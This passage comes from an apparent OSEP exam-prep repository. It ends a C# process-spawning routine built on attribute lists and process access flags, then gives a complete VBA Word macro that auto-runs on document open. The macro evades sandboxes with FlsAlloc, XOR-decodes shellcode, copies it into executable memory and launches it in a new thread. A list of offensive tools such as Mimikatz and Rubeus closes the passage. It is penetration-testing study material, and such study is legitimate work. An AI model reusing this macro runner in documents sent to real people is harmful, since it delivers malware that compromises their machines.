string(buf); 431 | } 432 | 433 | } while (true); 434 | reader.Close(); 435 | } 436 | finally 437 | { 438 | if (!safeHandle.IsClosed) 439 | { 440 | safeHandle.Close(); 441 | } 442 | } 443 | 444 | if (hStdOutRead != IntPtr.Zero) 445 | { 446 | CloseHandle(hStdOutRead); 447 | } 448 | Console.WriteLine(result); 449 | return true; 450 | 451 | 452 | } 453 | finally 454 | { 455 | // Free the attribute list 456 | if (siEx.lpAttributeList != IntPtr.Zero) 457 | { 458 | DeleteProcThreadAttributeList(siEx.lpAttributeList); 459 | Marshal.FreeHGlobal(siEx.lpAttributeList); 460 | } 461 | Marshal.FreeHGlobal(lpValueProc); 462 | 463 | // Close process and thread handles 464 | if (pInfo.hProcess != IntPtr.Zero) 465 | { 466 | CloseHandle(pInfo.hProcess); 467 | } 468 | if (pInfo.hThread != IntPtr.Zero) 469 | { 470 | CloseHandle(pInfo.hThread); 471 | } 472 | } 473 | } 474 | 475 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 476 | struct STARTUPINFOEX 477 | { 478 | public STARTUPINFO StartupInfo; 479 | public IntPtr lpAttributeList; 480 | } 481 | 482 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 483 | struct STARTUPINFO 484 | { 485 | public Int32 cb; 486 | public string lpReserved; 487 | public string lpDesktop; 488 | public string lpTitle; 489 | public Int32 dwX; 490 | public Int32 dwY; 491 | public Int32 dwXSize; 492 | public Int32 dwYSize; 493 | public Int32 dwXCountChars; 494 | public Int32 dwYCountChars; 495 | public Int32 dwFillAttribute; 496 | public Int32 dwFlags; 497 | public Int16 wShowWindow; 498 | public Int16 cbReserved2; 499 | public IntPtr lpReserved2; 500 | public IntPtr hStdInput; 501 | public IntPtr hStdOutput; 502 | public IntPtr hStdError; 503 | } 504 | 505 | [StructLayout(LayoutKind.Sequential)] 506 | internal struct PROCESS_INFORMATION 507 | { 508 | public IntPtr hProcess; 509 | public IntPtr hThread; 510 | public int dwProcessId; 511 | public int dwThreadId; 512 | } 513 | 514 | [StructLayout(LayoutKind.Sequential)] 515 | public struct SECURITY_ATTRIBUTES 516 | { 517 | public int nLength; 518 | public IntPtr lpSecurityDescriptor; 519 | [MarshalAs(UnmanagedType.Bool)] 520 | public bool bInheritHandle; 521 | } 522 | 523 | [Flags] 524 | public enum ProcessAccessFlags : uint 525 | { 526 | All = 0x001F0FFF, 527 | Terminate = 0x00000001, 528 | CreateThread = 0x00000002, 529 | VirtualMemoryOperation = 0x00000008, 530 | VirtualMemoryRead = 0x00000010, 531 | VirtualMemoryWrite = 0x00000020, 532 | DuplicateHandle = 0x00000040, 533 | CreateProcess = 0x000000080, 534 | SetQuota = 0x00000100, 535 | SetInformation = 0x00000200, 536 | QueryInformation = 0x00000400, 537 | QueryLimitedInformation = 0x00001000, 538 | Synchronize = 0x00100000 539 | } 540 | 541 | [Flags] 542 | enum HANDLE_FLAGS : uint 543 | { 544 | None = 0, 545 | INHERIT = 1, 546 | PROTECT_FROM_CLOSE = 2 547 | } 548 | 549 | [Flags] 550 | public enum DuplicateOptions : uint 551 | { 552 | DUPLICATE_CLOSE_SOURCE = 0x00000001, 553 | DUPLICATE_SAME_ACCESS = 0x00000002 554 | } 555 | } 556 | } 557 | ``` 558 | --- 559 | Macro 560 | 561 | ``` 562 | Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long 563 | Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadId As Long) As LongPtr 564 | Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr 565 | Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal destAddr As LongPtr, ByRef sourceAddr As Any, ByVal length As Long) As LongPtr 566 | Private Declare PtrSafe Function FlsAlloc Lib "KERNEL32" (ByVal callback As LongPtr) As LongPtr 567 | Sub MyMacro() 568 | Dim allocRes As LongPtr 569 | Dim t1 As Date 570 | Dim t2 As Date 571 | Dim time As Long 572 | Dim buf As Variant 573 | Dim addr As LongPtr 574 | Dim counter As Long 575 | Dim data As Long 576 | Dim res As LongPtr 577 | 578 | ' Call FlsAlloc and verify if the result exists 579 | allocRes = FlsAlloc(0) 580 | If IsNull(allocRes) Then 581 | End 582 | End If 583 | 584 | 585 | 586 | ' Shellcode encoded with XOR with key 0xfa/250 (output from C# helper tool of cas van cooten) 587 | ' If payload more than 25 lines, split it and join as below 588 | 589 | asd = Array(buf) 590 | das = Array(buf) 591 | 592 | buf = Split(Join(asd, ",") & "," & Join(das, ","), ",") 593 | ' Allocate memory space 594 | addr = VirtualAlloc(0, UBound(buf), &H3000, &H40) 595 | 596 | ' Decode the shellcode 597 | For i = 0 To UBound(buf) 598 | buf(i) = buf(i) Xor 250 599 | Next i 600 | 601 | ' Move the shellcode 602 | For counter = LBound(buf) To UBound(buf) 603 | data = buf(counter) 604 | res = RtlMoveMemory(addr + counter, data, 1) 605 | Next counter 606 | 607 | ' Execute the shellcode 608 | res = CreateThread(0, 0, addr, 0, 0, 0) 609 | End Sub 610 | Sub Document_Open() 611 | MyMacro 612 | End Sub 613 | Sub AutoOpen() 614 | MyMacro 615 | End Sub 616 | ``` -------------------------------------------------------------------------------- /Useful Resources/Tools.md: -------------------------------------------------------------------------------- 1 | # List of Tools/Scripts/Payload I have used so far in OSEP Labs 2 | ## Non Exhaustive list, Will update as I use more 3 | --- 4 | 1. [PEASS](https://github.com/carlospolop/PEASS-ng) 5 | 2. [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) 6 | 3. [BloodHound](https://github.com/BloodHoundAD/BloodHound) 7 | 4. [Mimikatz](https://github.com/gentilkiwi/mimikatz) 8 | 5. [Rubeus](https://github.com/GhostPack/Rubeus) 9 | 6. [Metasploit](https://github.com/rapid7/metasploit-framework) 10 | 7. [SSHUTTLE](https://github.com/apenwarr/sshuttle) 11 | 8. [Chisel](https://github.com/jpillora/chisel) 12 | 9. [Impacket](https://github.com/SecureAuthCorp/impacket) 13 | 10. [Nishang](https://github.com/samratashok/nishang) 14 | 11. [PrintSpoofer](https://github.com/itm4n/PrintSpoofer) *Straight exploit* 15 | 12. [VBA](https://github.com/itm4n/VBA-RunPE/blob/master/RunPE.vba) 16 | -------------------------------------------------------------------------------- /images/Default.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ross46/OSEP-PREP/62c43ccde53f081a19e65f14ca0898b6013569df/images/Default.png --------------------------------------------------------------------------------